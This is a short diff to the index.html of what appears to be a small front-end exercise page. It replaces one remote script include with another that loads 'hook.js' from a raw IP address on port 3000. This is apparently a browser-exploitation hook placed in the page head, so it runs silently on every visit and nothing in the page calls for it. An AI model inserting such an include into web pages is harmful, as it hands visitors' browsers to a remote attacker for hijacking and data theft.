--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 
 <head>
-  <script src="https://dhanuvarsha.github.io/Four-card-feature-section:3000/hook.js"></script>
+  <script src="https://185.199.111.153:3000/hook.js"></script>
   
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- displays site properly based on user's device -->
